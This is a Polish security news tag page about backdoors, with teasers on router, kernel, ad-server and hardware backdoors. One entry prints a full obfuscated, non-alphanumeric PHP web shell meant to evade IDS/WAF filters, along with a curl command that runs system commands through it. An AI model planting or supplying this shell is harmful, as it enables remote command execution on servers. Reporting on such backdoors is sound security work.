Wpisy z tagiem "tylna furtka"

Przednia furtka, a w zasadzie otwarte wrota w ruterze Netgear

Przednia furtka, a w zasadzie otwarte wrota w ruterze Netgear

Często opisujemy tylne furtki w oprogramowaniu urządzeń sieciowych. Po co komu jednak tylna furtka skoro wrota dostępu są szeroko otwarte? W niektórych modelach ruterów Netgear można jednym linkiem na stałe wyłączyć uwierzytelnienie.… Czytaj dalej

Kolejna tylna furtka w ruterach – wystarczy magiczny pakiet UDP

Kolejna tylna furtka w ruterach – wystarczy magiczny pakiet UDP

Autor odkrycia tylnej furtki w ruterach D-Linka tym razem zabrał się za sprzęt firmy Tenda. Jak się domyślacie, czytacie ten artykuł, ponieważ tam również znalazł fragment kodu odpowiedzialny za wykonywanie nieautoryzowanych poleceń.… Czytaj dalej

Ciekawa tylna furtka w kilku modelach ruterów D-Linka

Ciekawa tylna furtka w kilku modelach ruterów D-Linka

Mimo rozlicznych dowodów na to, że każda tylna furtka prędzej czy później zostanie odnaleziona, producenci sprzętu sieciowego ciągle zostawiają w kodzie swoich urządzeń różne niespodzianki. Tym razem padło na rutery D-Linka.… Czytaj dalej

Już w 2003 próbowano wstawić sprytną tylną furtkę do jądra Linuksa

Już w 2003 próbowano wstawić sprytną tylną furtkę do jądra Linuksa

Wobec ostatnich rewelacji dotyczącej działalności NSA oraz dwuznacznej odpowiedzi Linusa Torvaldsa na pytanie, czy rząd próbował wstawić tylną furtkę do Linuksa, warto przypomnieć historię z roku 2003, kiedy taką próbę zanotowano.… Czytaj dalej

Tylna furtka w PHP bez znaków alfanumerycznych

Również bez cudzysłowów, funkcji, stałych… Ciekawe, ile systemów typu IDS/WAF może ominąć. Wygląda tak:

@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$ 
$_[$__+ $__] ;$_[@-_]($_[@!+_] );

a używa się jej tak:

$ curl 'http://127.0.0.1:9999/shell.php?0=system&1=uname%20-a'
Czytaj dalej
Szyfrowanie większości połączeń sieci TOR może być złamane przez NSA

Szyfrowanie większości połączeń sieci TOR może być złamane przez NSA

Kilka dni temu dowiedzieliśmy się, że NSA prawdopodobnie jest w stanie skutecznie atakować wiele rodzajów szyfrowania, stosowanych w sieci. Jak się okazuje, jedną z możliwych ofiar tych praktyk mogą być również połączenia w anonimowej sieci TOR.… Czytaj dalej

Dowody na istnienie tylnych furtek w programach szyfrujących?

Dowody na istnienie tylnych furtek w programach szyfrujących?

Za sprawą afery z amerykańskimi podsłuchami powrócił dzisiaj wątek tylnych furtek w oprogramowaniu służącym do szyfrowania plików oraz całych dysków. Postanowiliśmy bliżej się mu przyjrzeć i trafiliśmy na bardzo ciekawy, a mało znany dokument.… Czytaj dalej

Tylna furtka w pliku licencji GNU GPL

Może nie jest to pomysł na miarę Pwnie Awards 2014, ale trzeba przyznać jego autorom, że ma pewne szanse powodzenia. Badacze z firmy Sucuri odnaleźli na zaatakowanym serwerze ciekawy plik Joomli o nazwie COPYRIGHT.php (standardowo plik taki dołączany jest do każdej instalacji).… Czytaj dalej

Cisco umieściło w dokumentacji login i hasło uprzywilejowanego konta

Cisco umieściło w dokumentacji login i hasło uprzywilejowanego konta

Tylne furtki w urządzeniach różnych producentów to najczęściej celowo skonfigurowane lub zapomniane konta serwisowe, o których nie ma ani słowa w dokumentacji. Cisco postawiło poprzeczkę wyżej – swoją tylną furtkę opisało w oficjalnej instrukcji.… Czytaj dalej

Tylna furtka w OpenX

Jeśli korzystacie z OpenX do serwowania reklam, lepiej sprawdźcie, czy Wasza wersja nie ma dodatkowych funkcjonalności. Serwis xClose.de ostrzega, że w archiwum z najnowszą paczką (2.8.10) znajduje się tylna furtka, umożliwiająca zdalne wykonanie kodu PHP. Co gorsza, złośliwy kod znaleziono również w paczce z października 2012, zatem może on być obecny we wszystkich wersjach pobieranych przez ostatnie ponad pół roku.… Czytaj dalej

Praktyczna implementacja tylnej furtki w pamięci flash dysku twardego

Praktyczna implementacja tylnej furtki w pamięci flash dysku twardego

Wyobraźcie sobie tylną furtkę, która może być instalowania zdalnie, aktywowana na żądanie, daje dostęp do konta root, jest nie do wykrycia podczas analizy systemu plików i przetrwa pełną reinstalację systemu operacyjnego. Science fiction? Nie.… Czytaj dalej

Backdoor w nagłówkach EXIF plików JPG

Backdoor w nagłówkach EXIF plików JPG

Kreatywność twórców złośliwego oprogramowania jeszcze długo będzie nas zaskakiwać. Tym razem, starając się utrudnić lokalizację i usunięcie skutków infekcji serwerów www, ukryli główny element tylnej furtki w pliku graficznym.… Czytaj dalej

Zwolniony administrator zostawił rootkita na 2700 serwerach

Zwolniony administrator zostawił rootkita na 2700 serwerach

Jednym z największych zagrożeń dla bezpieczeństwa danych, oprócz hakerów, są osoby, które już dostęp do tych danych mają – czyli pracownicy. Przykładem takiego scenariusza jest historia zwolnienia administratora dużej amerykańskiej firmy hostingowej.… Czytaj dalej

Chiński backdoor w programowalnych układach Actela?

Chiński backdoor w programowalnych układach Actela?

Obawa przed pułapkami zawartymi w urządzeniach i oprogramowaniu produkowanych w Chinach od wielu lat spędza sen z powiek co bardziej paranoicznej części ich użytkowników. Tak, jak silne są podejrzenia, tak bardzo brak było dowodów. Do dzisiaj?… Czytaj dalej